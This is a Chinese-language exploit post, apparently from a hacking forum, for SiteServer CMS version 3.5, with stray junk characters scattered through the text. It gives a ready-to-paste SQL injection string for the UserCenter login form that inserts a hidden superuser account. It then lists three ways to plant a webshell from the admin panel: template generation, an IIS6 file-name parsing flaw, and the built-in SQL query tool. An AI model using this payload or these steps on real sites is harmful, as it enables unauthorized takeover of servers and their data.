经测试秒杀最新的3.5版% {) N5 g1 S* H8 ~! p" ?8 Z8 |
6 G( c" K5 g# e4 n ^. b- n" Gstieserver官网:www.siteserver.cn) ~* `; C! F, ~: I. W2 K
! E$ m V& Y( M7 d
y& j0 F3 I, L% w$ U( ~
! x* J( w% d& MEXP:
2 \$ S" v# p: g$ `" e" ?9 L6 n9 c4 q: z9 Y
直接访问UserCenter/login.aspx6 `8 ~' A5 z0 h# k; a2 X) b
" ?5 i2 M- T% N/ y$ C, O
- N2 L- v% x9 g- k
9 @7 o+ S$ f: @
用户名处输入:
2 T% {7 m' G& Z4 r$ J7 P8 r- C( u1 ^& W+ y2 m. R& V
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--2 v1 `& I" e* _4 L {3 z" l; u& i/ j
, x1 e+ ?1 G+ g
2 @ {6 P: C) Y5 j3 W
9 H4 m* i( T/ N1 y密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
- q$ l3 ^/ } D. i
, J' L( v0 L) I) v# }
" \- d9 n- y. ]8 B: B) G1 r3 H2 W& A# p/ _; d' A
之后再访问后台SiteServer/login.aspx用插入的用户登陆$ n! ?% D' ]% C, r
- v6 u- F4 \4 V7 Z1 Y7 N8 N: g3 { , h, D: S) y$ d% t' h- X6 F M/ [
3 ~0 l; L' Q5 A后台拿webshell的三种方法:+ a; q _4 i' p. b- S. s+ V
5 O! R* |! q- e" d一、
8 y# \/ B7 k' i a. ~/ c2 ^2 w* m+ G* L0 s! {
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
/ [% ^$ X9 p& q x( f% [/ y
! F" i" W: p# z8 O# [8 Y, k8 q/ O0 B二、7 z& I% ]* c# `: D. s
+ n6 d: |$ E; S0 @成员权限-》添加用户-》用户名为:1.asp
1 T( V+ E/ s+ |( y) Z. H, @
8 D) G; k; r9 r; Z& f. _; \; Chttp://127.0.0.1/usercenter/8 I5 p. E- H% v/ G, X
1 g5 A& h* ]# \6 g3 o* U1 o用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell$ k5 G, G+ g& p' L+ Y
W& Q) t! l- n3 d2 _" F(ps:后台添加用户时不会验证是否含有非法字符)
, h, ]# U: r3 H
5 Q& _0 j0 c( B% {: o* O三、
# S# c( y; J/ G( F7 e: J! j
. d2 \# D8 N8 Y系统工具-》实用工具-》机器参数查看9 N `5 @( j- `' N& C9 L" Z
可以看到数据库类型、名称,WEB路径
5 n4 {/ z! S/ u- u5 E8 r" k4 B. F' m6 V6 I8 ]$ t
系统工具-》数据库工具-》SQL语句查询% u: b( ~% s' R6 V: U" ?9 W: W
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。. ?6 G3 y- B2 o
; ?. u. I2 U5 O# B" B, d
|